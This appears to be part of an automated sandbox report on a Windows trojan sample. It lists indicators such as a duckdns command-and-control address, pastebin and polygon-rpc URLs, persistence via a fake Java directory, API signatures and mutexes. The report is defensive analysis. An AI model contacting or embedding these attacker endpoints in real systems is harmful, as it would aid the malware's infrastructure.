HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveUser-Agent: WinHTTP Example/1.0Content-Length: 136Host: polygon-rpc.com

Source: conhost.exe, 0000001B.00000002.3547471787.000002B353A61000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000002.3547471787.000002B3539F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/
Source: dialer_java.exe, 0000000F.00000003.1919052720.00000172AC920000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.phhttps://pastebin.com/raw/0UNPcCFkpolygon-rpc.com0x75
Source: conhost.exe, 0000001B.00000002.3547471787.000002B353AA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.php
Source: conhost.exe, 0000001B.00000002.3547471787.000002B353AA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.php4Y
Source: conhost.exe, 0000001B.00000002.3547471787.000002B353AEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/api/point.php9
Source: conhost.exe, 0000001B.00000002.3547471787.000002B353A61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/l
Source: conhost.exe, 0000001B.00000002.3547471787.000002B353A61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org/ll
Source: conhost.exe, 0000001B.00000002.3547471787.000002B353A61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blockchainlegion.duckdns.org:80/api/point.php
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: dialer_java.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: sE5IdDeTp2.exe, dialer_java.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dialer_java.exe, 0000000F.00000003.1919052720.00000172AC920000.00000004.00000001.00020000.00000000.sdmp, conhost.exe, 0000001B.00000002.3547136321.0000000140095000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/0UNPcCFk
Source: conhost.exe, 0000001B.00000002.3547859630.000002B353C05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/0UNPcCFt
Source: conhost.exe, 0000001B.00000003.1929171941.000002B353A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://polygon-rpc.com/
Source: conhost.exe, 0000001B.00000003.1932871231.000002B353A52000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000002.3547471787.000002B353A4B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1932967988.000002B353A57000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1931997463.000002B353A52000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1930710101.000002B353A51000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001B.00000003.1928785863.000002B353A51000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://polygon-rpc.com:443/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown

HTTPS traffic detected: 173.244.207.29:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400344C0 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,		27_2_00000001400344C0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140034A20 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,		27_2_0000000140034A20

Source: schtasks.exe	Process created: 42
Source: conhost.exe	Process created: 42

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF7796F1394 NtAccessCheckAndAuditAlarm,	0_2_00007FF7796F1394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DC1394 NtQueryInformationThread,	15_2_00007FF695DC1394
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140001394 NtPrePrepareEnlistment,	27_2_0000000140001394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F711394 NtAllocateUserPhysicalPagesEx,	34_2_00007FF79F711394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21D1394 NtAccessCheck,	48_2_00007FF7F21D1394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC21394 NtDeleteFile,	63_2_00007FF7CFC21394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA01394 NtDeleteWnfStateData,	77_2_00007FF79AA01394
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF779851394 NtLockProductActivationKeys,	91_2_00007FF779851394

Source: C:\Windows\System32\conhost.exe

Code function: 27_2_00000001400394B0: MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,CreateFile2,DeviceIoControl,CloseHandle,free,malloc,memcpy,WideCharToMultiByte,WideCharToMultiByte,calloc,WideCharToMultiByte,strncpy,free,free,free,

27_2_00000001400394B0

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF779700A70	0_2_00007FF779700A70
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF7796F92BB	0_2_00007FF7796F92BB
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF779700160	0_2_00007FF779700160
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF7796FA480	0_2_00007FF7796FA480
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF779704440	0_2_00007FF779704440
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF7796FAD10	0_2_00007FF7796FAD10
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF7796F1B40	0_2_00007FF7796F1B40
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF779713B80	0_2_00007FF779713B80
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF7797076E0	0_2_00007FF7797076E0
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF779706520	0_2_00007FF779706520
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: 0_2_00007FF77970D0F0	0_2_00007FF77970D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DE3B80	15_2_00007FF695DE3B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DD76E0	15_2_00007FF695DD76E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DDD0F0	15_2_00007FF695DDD0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DC92BB	15_2_00007FF695DC92BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DD0A70	15_2_00007FF695DD0A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DD0160	15_2_00007FF695DD0160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DD6520	15_2_00007FF695DD6520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DCAD10	15_2_00007FF695DCAD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DCA480	15_2_00007FF695DCA480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DD4440	15_2_00007FF695DD4440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 15_2_00007FF695DC1B40	15_2_00007FF695DC1B40
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400938C0	27_2_00000001400938C0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400938E0	27_2_00000001400938E0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014006405B	27_2_000000014006405B
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140012071	27_2_0000000140012071
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140071080	27_2_0000000140071080
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400700B0	27_2_00000001400700B0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014006E0F0	27_2_000000014006E0F0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000D0FC	27_2_000000014000D0FC
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014003D170	27_2_000000014003D170
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400471A0	27_2_00000001400471A0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014001A230	27_2_000000014001A230
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400102DE	27_2_00000001400102DE
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014004E340	27_2_000000014004E340
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000E34B	27_2_000000014000E34B
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000C39C	27_2_000000014000C39C
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140072400	27_2_0000000140072400
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000A430	27_2_000000014000A430
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014001144E	27_2_000000014001144E
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400334C0	27_2_00000001400334C0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014005E510	27_2_000000014005E510
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400485E0	27_2_00000001400485E0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014006F630	27_2_000000014006F630
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000B63C	27_2_000000014000B63C
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140032650	27_2_0000000140032650
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014001C650	27_2_000000014001C650
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140012691	27_2_0000000140012691
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000D70B	27_2_000000014000D70B
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140043730	27_2_0000000140043730
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000F73E	27_2_000000014000F73E
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140070760	27_2_0000000140070760
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014006B7F0	27_2_000000014006B7F0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014002E830	27_2_000000014002E830
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400108AE	27_2_00000001400108AE
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014003D8C2	27_2_000000014003D8C2
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140061910	27_2_0000000140061910
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014001C918	27_2_000000014001C918
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140018940	27_2_0000000140018940
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014005A9C0	27_2_000000014005A9C0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140072A20	27_2_0000000140072A20
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140072A22	27_2_0000000140072A22
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140062A50	27_2_0000000140062A50
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000CA4C	27_2_000000014000CA4C
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140021A60	27_2_0000000140021A60
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140011A61	27_2_0000000140011A61
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014006CB20	27_2_000000014006CB20
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140030B40	27_2_0000000140030B40
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014007BB50	27_2_000000014007BB50
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014001EBB0	27_2_000000014001EBB0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014003DBE0	27_2_000000014003DBE0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140072C00	27_2_0000000140072C00
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014001CC12	27_2_000000014001CC12
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140041CA0	27_2_0000000140041CA0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000BCEC	27_2_000000014000BCEC
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140051D10	27_2_0000000140051D10
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000FD0E	27_2_000000014000FD0E
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000DD2B	27_2_000000014000DD2B
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140006D30	27_2_0000000140006D30
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000ED30	27_2_000000014000ED30
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140047D50	27_2_0000000140047D50
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140071D70	27_2_0000000140071D70
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140068D80	27_2_0000000140068D80
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014006ED80	27_2_000000014006ED80
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140008DB0	27_2_0000000140008DB0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140053DF0	27_2_0000000140053DF0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140010E7E	27_2_0000000140010E7E
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014006AEA0	27_2_000000014006AEA0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140019EC0	27_2_0000000140019EC0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_000000014000AF8C	27_2_000000014000AF8C
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140054FB0	27_2_0000000140054FB0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F733B80	34_2_00007FF79F733B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F72D0F0	34_2_00007FF79F72D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F7276E0	34_2_00007FF79F7276E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F726520	34_2_00007FF79F726520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F71AD10	34_2_00007FF79F71AD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F724440	34_2_00007FF79F724440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F71A480	34_2_00007FF79F71A480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F711B40	34_2_00007FF79F711B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F7192BB	34_2_00007FF79F7192BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F720A70	34_2_00007FF79F720A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 34_2_00007FF79F720160	34_2_00007FF79F720160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21F3B80	48_2_00007FF7F21F3B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21D1B40	48_2_00007FF7F21D1B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21E4440	48_2_00007FF7F21E4440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21DA480	48_2_00007FF7F21DA480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21DAD10	48_2_00007FF7F21DAD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21E0160	48_2_00007FF7F21E0160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21E0A70	48_2_00007FF7F21E0A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21D92BB	48_2_00007FF7F21D92BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21ED0F0	48_2_00007FF7F21ED0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21E6520	48_2_00007FF7F21E6520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 48_2_00007FF7F21E76E0	48_2_00007FF7F21E76E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC43B80	63_2_00007FF7CFC43B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC3D0F0	63_2_00007FF7CFC3D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC376E0	63_2_00007FF7CFC376E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC36520	63_2_00007FF7CFC36520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC2AD10	63_2_00007FF7CFC2AD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC2A480	63_2_00007FF7CFC2A480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC34440	63_2_00007FF7CFC34440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC21B40	63_2_00007FF7CFC21B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC292BB	63_2_00007FF7CFC292BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC30A70	63_2_00007FF7CFC30A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 63_2_00007FF7CFC30160	63_2_00007FF7CFC30160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA23B80	77_2_00007FF79AA23B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA01B40	77_2_00007FF79AA01B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA0AD10	77_2_00007FF79AA0AD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA14440	77_2_00007FF79AA14440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA0A480	77_2_00007FF79AA0A480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA10160	77_2_00007FF79AA10160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA092BB	77_2_00007FF79AA092BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA10A70	77_2_00007FF79AA10A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA1D0F0	77_2_00007FF79AA1D0F0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA16520	77_2_00007FF79AA16520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 77_2_00007FF79AA176E0	77_2_00007FF79AA176E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF779873B80	91_2_00007FF779873B80
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF7798592BB	91_2_00007FF7798592BB
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF779860A70	91_2_00007FF779860A70
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF779860160	91_2_00007FF779860160
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF77985AD10	91_2_00007FF77985AD10
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF779864440	91_2_00007FF779864440
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF77985A480	91_2_00007FF77985A480
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF779851B40	91_2_00007FF779851B40
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF7798676E0	91_2_00007FF7798676E0
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF779866520	91_2_00007FF779866520
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: 91_2_00007FF77986D0F0	91_2_00007FF77986D0F0

Source: C:\Windows\System32\conhost.exe	Code function: String function: 000000014000E9F0 appears 42 times
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Code function: String function: 00007FF7796F1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF79AA01394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF779851394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF79F711394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF7CFC21394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF695DC1394 appears 31 times
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Code function: String function: 00007FF7F21D1394 appears 31 times

Source: sE5IdDeTp2.exe

Static PE information: invalid certificate

Source: classification engine

Classification label: mal96.troj.expl.evad.winEXE@157/56@4/2

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
